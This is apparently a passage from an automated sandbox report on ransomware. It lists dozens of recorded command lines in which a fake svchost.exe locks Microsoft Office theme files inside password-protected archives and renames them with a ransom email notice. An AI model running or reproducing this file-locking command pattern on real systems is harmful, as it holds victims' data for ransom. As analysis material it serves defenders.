  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Metro.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Metro.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2164
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Module.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Module.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1248
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Newsprint.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Newsprint.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1928
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Opulent.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Opulent.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - System Location Discovery: System Language Discovery
  PID:1840
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Oriel.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Oriel.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:416
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Origin.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Origin.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2600
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Paper.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Paper.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1368
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Perspective.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Perspective.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2464
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Pushpin.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Pushpin.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1280
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Slipstream.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Slipstream.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1972
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Solstice.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Solstice.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1804
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Technic.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Technic.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1076
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Thatch.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Thatch.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2520
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Trek.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Trek.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2400
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Urban.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Urban.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1940
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Verve.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Verve.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2020
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Waveform.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Colors\Waveform.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1144
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Adjacency.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Adjacency.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1572
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Angles.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Angles.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2948
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Apex.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Apex.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1352
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Apothecary.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Apothecary.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1764
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Aspect.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Aspect.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:3044
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Austin.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Austin.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1400
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Black Tie.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Black Tie.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1568
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Civic.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Civic.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2396
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Clarity.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Clarity.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1048
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Composite.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Composite.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2836
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Concourse.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Concourse.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1964
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Couture.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Couture.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2672
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Elemental.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Elemental.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2360
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Equity.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Equity.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:3056
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Essential.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Essential.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:3048
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Executive.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Executive.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:444
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Flow.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Flow.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2536
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Foundry.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Foundry.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2768
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Grid.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Grid.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2308
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Hardcover.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Hardcover.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1540
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Horizon.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Horizon.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1428
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Median.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Median.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2912
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Metro.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Metro.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2796
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Module.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Module.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2908
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Newsprint.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Newsprint.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:868
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Office 2.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Office 2.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2076
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Office Classic 2.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Office Classic 2.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:768
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Office Classic.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Office Classic.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2032
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Opulent.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Opulent.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2160
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Oriel.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Oriel.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1840
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Origin.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Origin.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  - Drops file in Program Files directory
  PID:1936
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Paper.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Paper.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:704
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Perspective.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Perspective.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1628
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Pushpin.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Pushpin.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1096
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Slipstream.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Slipstream.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2024
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Solstice.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Solstice.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1932
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Technic.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Technic.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2044
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Thatch.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Thatch.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:2984
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Trek.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Trek.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1680
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Urban.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Urban.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1988
- C:\ProgramData\msvkp\svchost.exe
  "C:\ProgramData\msvkp\svchost.exe" a "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Verve.xml(!! to decrypt email id 1759665594 to [email protected] !!)" "C:\Program Files (x86)\Microsoft Office\Document Themes 14\Theme Fonts\Verve.xml" -sfxC:\Windows\system32\default2.sfx -dh -ep2 -hpxcqT100nnnuVFwVFwrnVuAuLnVAwLnqutuuALrAuFqnwVntruq -m0 -y
  2⤵
  PID:1952
- C:\ProgramData\msvkp\svchost.exe
